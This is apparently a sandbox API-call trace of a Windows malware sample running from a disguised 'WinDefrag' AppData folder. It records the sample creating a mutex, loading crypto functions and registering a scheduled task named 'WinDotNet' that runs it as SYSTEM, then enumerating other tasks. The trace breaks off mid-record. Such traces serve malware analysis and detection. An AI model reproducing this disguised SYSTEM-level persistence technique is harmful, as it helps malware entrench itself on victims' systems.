() returned 0x0 [0255.679] Sleep (dwMilliseconds=0x1) [0255.694] GetLastError () returned 0x0 [0255.694] Sleep (dwMilliseconds=0x1) [0255.710] GetLastError () returned 0x0 [0255.710] Sleep (dwMilliseconds=0x1) [0255.725] GetLastError () returned 0x0 [0255.726] Sleep (dwMilliseconds=0x1) [0255.741] GetLastError () returned 0x0 [0255.741] Sleep (dwMilliseconds=0x1) [0255.756] GetLastError () returned 0x0 [0255.757] Sleep (dwMilliseconds=0x1) [0255.772] GetLastError () returned 0x0 [0255.772] Sleep (dwMilliseconds=0x1) [0255.788] GetLastError () returned 0x0 [0255.788] Sleep (dwMilliseconds=0x1) [0255.803] GetLastError () returned 0x0 [0255.804] Sleep (dwMilliseconds=0x1) [0255.829] GetLastError () returned 0x0 [0255.829] Sleep (dwMilliseconds=0x1) [0255.837] GetLastError () returned 0x0 [0255.837] Sleep (dwMilliseconds=0x1) [0255.850] GetLastError () returned 0x0 [0255.850] Sleep (dwMilliseconds=0x1) [0255.866] GetLastError () returned 0x0 [0255.866] Sleep (dwMilliseconds=0x1) [0255.881] GetLastError () returned 0x0 [0255.881] Sleep (dwMilliseconds=0x1) [0255.897] GetLastError () returned 0x0 [0255.897] Sleep (dwMilliseconds=0x1) [0255.913] GetLastError () returned 0x0 [0255.913] Sleep (dwMilliseconds=0x1) [0255.928] GetLastError () returned 0x0 [0255.928] Sleep (dwMilliseconds=0x1) [0255.945] GetLastError () returned 0x0 [0255.945] Sleep (dwMilliseconds=0x1) [0255.959] GetLastError () returned 0x0 [0255.959] Sleep (dwMilliseconds=0x1) [0255.976] GetLastError () returned 0x0 [0255.976] Sleep (dwMilliseconds=0x1) [0255.991] GetLastError () returned 0x0 [0255.991] Sleep (dwMilliseconds=0x1) [0256.006] GetLastError () returned 0x0 [0256.006] Sleep (dwMilliseconds=0x1) [0256.022] GetLastError () returned 0x0 [0256.022] Sleep (dwMilliseconds=0x1) [0256.038] GetLastError () returned 0x0 [0256.038] Sleep (dwMilliseconds=0x1) [0256.053] GetLastError () returned 0x0 [0256.053] Sleep (dwMilliseconds=0x1) [0256.068] GetLastError () returned 0x0 [0256.069] Sleep (dwMilliseconds=0x1) [0256.084] GetLastError () returned 0x0 [0256.084] Sleep (dwMilliseconds=0x1) [0256.100] GetLastError () returned 0x0 [0256.100] Sleep (dwMilliseconds=0x1) [0256.116] GetLastError () returned 0x0 [0256.116] Sleep (dwMilliseconds=0x1) [0256.131] GetLastError () returned 0x0 [0256.131] Sleep (dwMilliseconds=0x1) [0256.167] GetLastError () returned 0x0 [0256.167] Sleep (dwMilliseconds=0x1) [0256.178] GetLastError () returned 0x0 [0256.178] Sleep (dwMilliseconds=0x1) [0256.193] GetLastError () returned 0x0 [0256.193] Sleep (dwMilliseconds=0x1) [0256.209] GetLastError () returned 0x0 [0256.209] Sleep (dwMilliseconds=0x1) [0256.227] GetLastError () returned 0x0 [0256.227] Sleep (dwMilliseconds=0x1) [0256.240] GetLastError () returned 0x0 [0256.240] Sleep (dwMilliseconds=0x1) [0256.256] GetLastError () returned 0x0 [0256.256] Sleep (dwMilliseconds=0x1) [0256.272] GetLastError () returned 0x0 [0256.272] Sleep (dwMilliseconds=0x1) [0256.287] GetLastError () returned 0x0 [0256.287] Sleep (dwMilliseconds=0x1) [0256.303] GetLastError () returned 0x0 [0256.303] Sleep (dwMilliseconds=0x1) [0256.318] GetLastError () returned 0x0 [0256.318] Sleep (dwMilliseconds=0x1) [0256.334] GetLastError () returned 0x0 [0256.334] Sleep (dwMilliseconds=0x1) [0256.349] GetLastError () returned 0x0 [0256.349] Sleep (dwMilliseconds=0x1) [0256.365] GetLastError () returned 0x0 [0256.365] Sleep (dwMilliseconds=0x1) [0256.381] GetLastError () returned 0x0 [0256.381] Sleep (dwMilliseconds=0x1) [0256.396] GetLastError () returned 0x0 [0256.396] Sleep (dwMilliseconds=0x1) [0256.412] GetLastError () returned 0x0 [0256.412] Sleep (dwMilliseconds=0x1) [0256.427] GetLastError () returned 0x0 [0256.428] Sleep (dwMilliseconds=0x1) [0256.443] GetLastError () returned 0x0 [0256.443] Sleep (dwMilliseconds=0x1) [0256.459] GetLastError () returned 0x0 [0256.459] Sleep (dwMilliseconds=0x1) [0256.474] GetLastError () returned 0x0 [0256.474] Sleep (dwMilliseconds=0x1) [0256.490] GetLastError () returned 0x0 [0256.490] Sleep (dwMilliseconds=0x1) [0256.505] GetLastError () returned 0x0 [0256.505] Sleep (dwMilliseconds=0x1) [0256.521] GetLastError () returned 0x0 [0256.521] Sleep (dwMilliseconds=0x1) [0256.537] GetLastError () returned 0x0 [0256.537] Sleep (dwMilliseconds=0x1) [0256.554] GetLastError () returned 0x0 [0256.554] Sleep (dwMilliseconds=0x1) [0256.568] GetLastError () returned 0x0 [0256.568] Sleep (dwMilliseconds=0x1) [0256.583] GetLastError () returned 0x0 [0256.583] Sleep (dwMilliseconds=0x1) [0256.599] GetLastError () returned 0x0 [0256.599] Sleep (dwMilliseconds=0x1) [0256.617] GetLastError () returned 0x0 [0256.617] Sleep (dwMilliseconds=0x1) [0256.630] GetLastError () returned 0x0 [0256.630] Sleep (dwMilliseconds=0x1) [0256.646] GetLastError () returned 0x0 [0256.646] Sleep (dwMilliseconds=0x1) [0256.661] GetLastError () returned 0x0 [0256.661] Sleep (dwMilliseconds=0x1) [0256.677] GetLastError () returned 0x0 [0256.677] Sleep (dwMilliseconds=0x1) [0256.693] GetLastError () returned 0x0 [0256.693] Sleep (dwMilliseconds=0x1) [0256.709] GetLastError () returned 0x0 [0256.709] Sleep (dwMilliseconds=0x1) [0256.724] GetLastError () returned 0x0 [0256.724] Sleep (dwMilliseconds=0x1) [0256.739] GetLastError () returned 0x0 [0256.739] Sleep (dwMilliseconds=0x1) [0256.755] GetLastError () returned 0x0 [0256.755] Sleep (dwMilliseconds=0x1) [0256.771] GetLastError () returned 0x0 [0256.771] Sleep (dwMilliseconds=0x1) [0256.787] GetLastError () returned 0x0 [0256.787] Sleep (dwMilliseconds=0x1) [0256.802] GetLastError () returned 0x0 [0256.802] Sleep (dwMilliseconds=0x1) [0256.818] GetLastError () returned 0x0 [0256.818] Sleep (dwMilliseconds=0x1) [0256.842] GetLastError () returned 0x0 [0256.842] Sleep (dwMilliseconds=0x1) [0256.849] GetLastError () returned 0x0 [0256.849] Sleep (dwMilliseconds=0x1) [0256.864] GetLastError () returned 0x0 [0256.864] Sleep (dwMilliseconds=0x1) [0256.880] GetLastError () returned 0x0 [0256.880] Sleep (dwMilliseconds=0x1) [0256.895] GetLastError () returned 0x0 [0256.895] Sleep (dwMilliseconds=0x1) [0256.911] GetLastError () returned 0x0 [0256.911] Sleep (dwMilliseconds=0x1) [0256.927] GetLastError () returned 0x0 [0256.927] Sleep (dwMilliseconds=0x1) [0256.945] GetLastError () returned 0x0 [0256.945] Sleep (dwMilliseconds=0x1) [0256.958] GetLastError () returned 0x0 [0256.958] Sleep (dwMilliseconds=0x1) [0256.973] GetLastError () returned 0x0 [0256.973] Sleep (dwMilliseconds=0x1) [0256.989] GetLastError () returned 0x0 [0256.989] Sleep (dwMilliseconds=0x1) [0257.004] GetLastError () returned 0x0 [0257.005] Sleep (dwMilliseconds=0x1) [0257.020] GetLastError () returned 0x0 [0257.020] Sleep (dwMilliseconds=0x1) [0257.036] GetLastError () returned 0x0 [0257.036] Sleep (dwMilliseconds=0x1) [0257.051] GetLastError () returned 0x0 [0257.051] Sleep (dwMilliseconds=0x1) [0257.067] GetLastError () returned 0x0 [0257.067] Sleep (dwMilliseconds=0x1) [0257.083] GetLastError () returned 0x0 [0257.083] Sleep (dwMilliseconds=0x1) [0257.098] GetLastError () returned 0x0 [0257.098] Sleep (dwMilliseconds=0x1) [0257.114] GetLastError () returned 0x0 [0257.114] Sleep (dwMilliseconds=0x1) [0257.130] GetLastError () returned 0x0 [0257.130] Sleep (dwMilliseconds=0x1) [0257.173] GetLastError () returned 0x0 [0257.173] Sleep (dwMilliseconds=0x1) [0257.176] GetLastError () returned 0x0 [0257.176] Sleep (dwMilliseconds=0x1) [0257.192] GetLastError () returned 0x0 [0257.192] Sleep (dwMilliseconds=0x1) [0257.207] GetLastError () returned 0x0 [0257.207] Sleep (dwMilliseconds=0x1) [0257.223] GetLastError () returned 0x0 [0257.223] Sleep (dwMilliseconds=0x1) [0257.238] GetLastError () returned 0x0 [0257.239] Sleep (dwMilliseconds=0x1) [0257.254] GetLastError () returned 0x0 [0257.254] Sleep (dwMilliseconds=0x1) [0257.270] GetLastError () returned 0x0 [0257.270] Sleep (dwMilliseconds=0x1) [0257.286] GetLastError () returned 0x0 [0257.286] Sleep (dwMilliseconds=0x1) [0257.301] GetLastError () returned 0x0 [0257.301] Sleep (dwMilliseconds=0x1) [0257.317] GetLastError () returned 0x0 [0257.317] Sleep (dwMilliseconds=0x1) [0257.334] GetLastError () returned 0x0 [0257.335] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ef2b0, nSize=0x200 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag\\tmp7149.exe")) returned 0x37 [0257.335] PathRemoveFileSpecW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag") returned 1 [0257.335] PathAddBackslashW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\") returned="" [0257.335] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag")) returned 1 [0257.335] GetTickCount () returned 0x4a2a4 [0257.335] srand (_Seed=0x1174b24) [0257.336] GetVersion () returned 0x1db10106 [0257.336] LoadLibraryW (lpLibFileName="Ncrypt.dll") returned 0x7fefd620000 [0257.343] LoadLibraryW (lpLibFileName="Bcrypt.dll") returned 0x7fefd5f0000 [0257.343] GetProcAddress (hModule=0x7fefd620000, lpProcName="NCryptOpenStorageProvider") returned 0x7fefd629990 [0257.346] GetProcAddress (hModule=0x7fefd620000, lpProcName="NCryptImportKey") returned 0x7fefd6255f0 [0257.346] GetProcAddress (hModule=0x7fefd620000, lpProcName="NCryptDeleteKey") returned 0x7fefd64f6a0 [0257.346] GetProcAddress (hModule=0x7fefd620000, lpProcName="NCryptFreeObject") returned 0x7fefd625c30 [0257.346] GetProcAddress (hModule=0x7fefd5f0000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x7fefd5f2640 [0257.346] GetProcAddress (hModule=0x7fefd5f0000, lpProcName="BCryptImportKeyPair") returned 0x7fefd5f1d30 [0257.347] GetProcAddress (hModule=0x7fefd5f0000, lpProcName="BCryptGetProperty") returned 0x7fefd5f1510 [0257.347] GetProcAddress (hModule=0x7fefd5f0000, lpProcName="BCryptVerifySignature") returned 0x7fefd605bc0 [0257.347] GetProcAddress (hModule=0x7fefd5f0000, lpProcName="BCryptCloseAlgorithmProvider") returned 0x7fefd5f32b0 [0257.347] GetProcAddress (hModule=0x7fefd5f0000, lpProcName="BCryptDestroyKey") returned 0x7fefd5f16a0 [0257.347] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0257.352] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0257.363] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0257.364] GetWindowsDirectoryW (in: lpBuffer=0x1ee340, uSize=0x208 | out: lpBuffer="C:\\Windows") returned 0xa [0257.364] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1ee568, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1ee568*=0x705ba84c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0257.365] _vsnwprintf (in: _Buffer=0x1ee5a0, _BufferCount=0x63, _Format="Global\\%08lX%04lX%lu", _ArgList=0x1ee228 | out: _Buffer="Global\\E0B7509842600") returned 20 [0257.365] CreateMutexW (lpMutexAttributes=0x1ee580, bInitialOwner=1, lpName="Global\\E0B7509842600") returned 0xfc [0257.365] LocalFree (hMem=0x2a2ec0) returned 0x0 [0257.365] GetLastError () returned 0x0 [0257.365] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77b20000 [0257.365] GetProcAddress (hModule=0x77b20000, lpProcName="HeapAlloc") returned 0x77c933a0 [0257.366] GetProcAddress (hModule=0x77b20000, lpProcName="GetProcessHeap") returned 0x77b43050 [0257.366] GetProcAddress (hModule=0x77b20000, lpProcName="HeapFree") returned 0x77b43070 [0257.366] GetProcAddress (hModule=0x77b20000, lpProcName="HeapReAlloc") returned 0x77c73f20 [0257.366] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2bd510, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag\\tmp7149.exe")) returned 0x37 [0257.366] PathRenameExtensionW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe", pszExt=".tmp" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.tmp") returned 1 [0257.366] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag\\tmp7149.tmp")) returned 0xffffffff [0257.366] GetVersionExW (in: lpVersionInformation=0x1ee550*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x400258ec, dwBuildNumber=0x1, dwPlatformId=0x2a2ec0, szCSDVersion="") | out: lpVersionInformation=0x1ee550*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0257.366] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2bd510, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag\\tmp7149.exe")) returned 0x37 [0257.367] GetVersion () returned 0x1db10106 [0257.367] CoCreateInstance (in: rclsid=0x14002e0e8*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x14002ded8*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x140033368 | out: ppv=0x140033368*=0x457f10) returned 0x0 [0257.375] TaskScheduler:ITaskService:Connect (This=0x457f10, serverName=0x1ee2b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0x1ee350*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0x1ee270*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0x1ee230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0257.380] TaskScheduler:ITaskService:GetFolder (in: This=0x457f10, Path=0x0, ppFolder=0x1ee690 | out: ppFolder=0x1ee690*=0x46df80) returned 0x0 [0257.383] AllocateAndInitializeSid (in: pIdentifierAuthority=0x1eda00, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x1eda18 | out: pSid=0x1eda18*=0x2b6ac0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0257.383] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2b6ac0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x1edae0, cchName=0x1ee138, ReferencedDomainName=0x1edce0, cchReferencedDomainName=0x1ee128, peUse=0x1eda10 | out: Name="SYSTEM", cchName=0x1ee138, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x1ee128, peUse=0x1eda10) returned 1 [0257.385] _time64 (in: _Time=0x1eda08 | out: _Time=0x1eda08) returned 0x5c09a2e2 [0257.385] _localtime64 (_Time=0x1eda08) returned 0x455a10 [0257.387] wcsftime (in: _Buf=0x1eda40, _SizeInWords=0x1a, _Format="%Y-%m-%dT%H:%M:%S", _Tm=0x455a10 | out: _Buf="2018-12-06T22:30:54") returned 0x13 [0257.388] ITaskFolder:RegisterTask (in: This=0x46df80, Path="WinDotNet", XmlText="\n\n\n1.0.1\nWinDotNet\n\n\n\n\ntrue\n\n\n\nPT10M\nP415DT15H58M\nfalse\n\n2018-12-06T22:30:54\ntrue\n\n\n\n\nHighestAvailable\nNT AUTHORITY\\SYSTEM\nInteractiveToken\n\n\n\nIgnoreNew\nfalse\nfalse\nfalse\ntrue\nfalse\n\ntrue\nfalse\n\ntrue\ntrue\ntrue\nfalse\nfalse\nPT0S\n7\n\n\n\nC:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\n\n\n\n", flags=6, UserId=0x1ee250*(varType=0x8, wReserved1=0x1e, wReserved2=0x0, wReserved3=0x0, varVal1="SYSTEM", varVal2=0x1ee228), password=0x1ee2f0*(varType=0x0, wReserved1=0x1e, wReserved2=0x0, wReserved3=0x0, varVal1=0x280270, varVal2=0x4cfca4e50f87369f), LogonType=5, sddl=0x1ee330*(varType=0x0, wReserved1=0x8b6e, wReserved2=0x8bac, wReserved3=0x70dd, varVal1=0x7feffbc6cd0, varVal2=0x8), ppTask=0x1ee170 | out: ppTask=0x1ee170*=0x456670) returned 0x0 [0257.507] GetCurrentProcess () returned 0xffffffffffffffff [0257.508] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x1ee138 | out: TokenHandle=0x1ee138*=0x124) returned 1 [0257.508] GetTokenInformation (in: TokenHandle=0x124, TokenInformationClass=0x1, TokenInformation=0x1ee0a0, TokenInformationLength=0x54, ReturnLength=0x1ee120 | out: TokenInformation=0x1ee0a0, ReturnLength=0x1ee120) returned 1 [0257.508] AllocateAndInitializeSid (in: pIdentifierAuthority=0x1ee128, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x1ee130 | out: pSid=0x1ee130*=0x2b6ac0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0257.508] EqualSid (pSid1=0x1ee0b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), pSid2=0x2b6ac0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0257.508] CloseHandle (hObject=0x124) returned 1 [0257.508] ITaskFolder:GetTasks (in: This=0x46df80, flags=1, ppTasks=0x1edfd0 | out: ppTasks=0x1edfd0*=0x456710) returned 0x0 [0257.514] IRegisteredTaskCollection:get_Count (in: This=0x456710, pCount=0x1ee120 | out: pCount=0x1ee120*=5) returned 0x0 [0257.514] IRegisteredTaskCollection:get_Item (in: This=0x456710, index=0x1ee000*(varType=0x3, wReserved1=0x2b, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x1), ppRegisteredTask=0x1edfc8 | out: ppRegisteredTask=0x1edfc8*=0x4567b0) returned 0x0 [0257.514] IRegisteredTask:get_Name (in: This=0x4567b0, pName=0x1edfc0 | out: pName=0x1edfc0*="Adobe Flash Player Updater") returned 0x0 [0257.514] IRegisteredTask:get_Xml (in: This=0x4567b0, pXml=0x1edfb0 | out: pXml=0x1edfb0*="\r\n\r\n \r\n Adobe Systems Incorporated\r\n This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.\r\n \r\n \r\n \r\n true\r\n \r\n PT3600S\r\n PT86400S\r\n false\r\n \r\n 2000-01-01T00:59:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n PT259200S\r\n false\r\n false\r\n false\r\n true\r\n false\r\n 9\r\n \r\n PT600S\r\n PT3600S\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n System\r\n InteractiveTokenOrPassword\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n C:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashPlayerUpdateService.exe\r\n \r\n \r\n") returned 0x0 [0257.520] StrStrIW (lpFirst="\r\n\r\n \r\n Adobe Systems Incorporated\r\n This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.\r\n \r\n \r\n \r\n true\r\n \r\n PT3600S\r\n PT86400S\r\n false\r\n \r\n 2000-01-01T00:59:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n PT259200S\r\n false\r\n false\r\n false\r\n true\r\n false\r\n 9\r\n \r\n PT600S\r\n PT3600S\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n System\r\n InteractiveTokenOrPassword\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n C:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashPlayerUpdateService.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0257.562] IUnknown:Release (This=0x4567b0) returned 0x0 [0257.562] IRegisteredTaskCollection:get_Item (in: This=0x456710, index=0x1ee000*(varType=0x3, wReserved1=0x2b, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x1), ppRegisteredTask=0x1edfc8 | out: ppRegisteredTask=0x1edfc8*=0x4567b0) returned 0x0 [0257.563] IRegisteredTask:get_Name (in: This=0x4567b0, pName=0x1edfc0 | out: pName=0x1edfc0*="GoogleUpdateTaskMachineCore") returned 0x0 [0257.563] IRegisteredTask:get_Xml (in: This=0x4567b0, pXml=0x1edfb0 | out: pXml=0x1edfb0*="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x74\x72\x75\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x38\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72